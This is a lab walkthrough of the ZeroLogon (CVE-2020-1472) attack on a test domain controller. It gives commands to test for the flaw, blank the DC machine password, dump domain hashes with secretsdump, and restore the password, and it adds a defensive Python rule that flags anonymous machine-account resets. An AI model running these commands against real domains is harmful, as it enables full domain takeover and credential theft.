ZeroLogon Attacks
PRACTICE ! PRACTICE ! PRACTICE !
This is a serious vulnerability (CVE-2020-1472) which lets an unauthenticated attacker set the domain controller's machine account password (HYDRA-DC$ here) to an empty string :) - The logic behind this vulnerability deals with a flaw in how Netlogon applies Windows cryptography (AES-CFB8 with an all-zero IV). Let's first test whether the DC is vulnerable to this exploit using a python script
$ python3 zerologon_tester.py HYDRA-DC 192.168.169.147
Performing authentication attempts...
Success! DC can be fully compromised by a Zerologon attack.
Now that we know it's vulnerable, let's exploit the DC :)
$ python3 cve-2020-1472-exploit.py HYDRA-DC 192.168.169.147
Performing authentication attempts...
Target vulnerable, changing account password to empty string
Result: 0
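The password reset shown above leaves a trace that a defender can hunt for in the Security log. The following is an added example, not part of these notes or of the exploit scripts: it flags Event ID 4742 ("A computer account was changed") records where a machine account's password was changed by ANONYMOUS LOGON, which is how an unauthenticated Netlogon call appears. The event records and the list of DC names are constructed/assumed for the example.

```python
"""Flag Security events consistent with a Zerologon-style reset of a
machine-account password. Sample records are constructed, not real logs."""

DOMAIN_CONTROLLERS = {"HYDRA-DC$"}  # assumed DC machine-account names

# Constructed sample events; field names follow the Security log's
# EventData names for 4742. Only the fields the rule reads are included.
SAMPLE_EVENTS = [
    # Normal 30-day machine password rollover performed by the DC itself.
    {"EventID": 4742, "SubjectUserName": "HYDRA-DC$", "SubjectDomainName": "MARVEL",
     "TargetUserName": "HYDRA-DC$", "TargetDomainName": "MARVEL",
     "PasswordLastSet": "9/14/2020 3:12:08 PM"},
    # Admin adjusting a workstation account: not the pattern we want.
    {"EventID": 4742, "SubjectUserName": "administrator", "SubjectDomainName": "MARVEL",
     "TargetUserName": "WS01$", "TargetDomainName": "MARVEL",
     "PasswordLastSet": "-"},
    # Unauthenticated reset of the DC's own account: the Zerologon pattern.
    {"EventID": 4742, "SubjectUserName": "ANONYMOUS LOGON", "SubjectDomainName": "NT AUTHORITY",
     "TargetUserName": "HYDRA-DC$", "TargetDomainName": "MARVEL",
     "PasswordLastSet": "9/14/2020 3:40:51 PM"},
    # Unrelated event type, must be ignored even with the same principals.
    {"EventID": 4624, "SubjectUserName": "ANONYMOUS LOGON", "TargetUserName": "HYDRA-DC$"},
]


def classify(event):
    """Return None if the event is benign, otherwise a severity string."""
    if event.get("EventID") != 4742:
        return None
    target = event.get("TargetUserName", "")
    subject = event.get("SubjectUserName", "")
    # Machine accounts end with '$'; an anonymous change to one is never normal.
    if not target.endswith("$") or subject.upper() != "ANONYMOUS LOGON":
        return None
    # Any anonymous machine-account change deserves a look; on a DC it is critical.
    return "critical" if target.upper() in DOMAIN_CONTROLLERS else "high"


def find_suspicious_resets(events):
    """Return (severity, event) pairs for every event matching the rule."""
    return [(classify(ev), ev) for ev in events if classify(ev)]


if __name__ == "__main__":
    for sev, ev in find_suspicious_resets(SAMPLE_EVENTS):
        print(f"[{sev}] {ev['SubjectUserName']} changed {ev['TargetUserName']} "
              f"(PasswordLastSet={ev.get('PasswordLastSet')})")
```

Patched DCs additionally log Netlogon events 5827-5831 for vulnerable secure-channel attempts, which make a good companion signal to this rule.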
Now how do we check whether the DC account's password is really set to null? Run secretsdump as the machine account and just hit Enter at the password prompt:
$ impacket-secretsdump -just-dc MARVEL/HYDRA-DC\$@192.168.169.147
Password: <Hit Enter>
[ REDACTED ]
With the dumped hashes we can pretty much generate Golden Tickets for persistence, take advantage of any user on the domain, psexec into machines and do anything :)
Now how do we restore this? A DC left with an empty machine-account password will break replication and Netlogon, so the original password must be put back. First dump the local secrets with the Administrator's hash (impacket's -hashes takes LM:NT order):
$ impacket-secretsdump administrator@192.168.169.147 -hashes <LM Hash>:<NT Hash>

Copy down the hex value from the $MACHINE.ACC:plain_password_hex: line of the output and run the restore python script
$ python3 restorepassword.py MARVEL/HYDRA-DC@HYDRA-DC -target-ip 192.168.169.147 -hexpass <HEX VALUE>
[ REDACTED ]
Change Password OK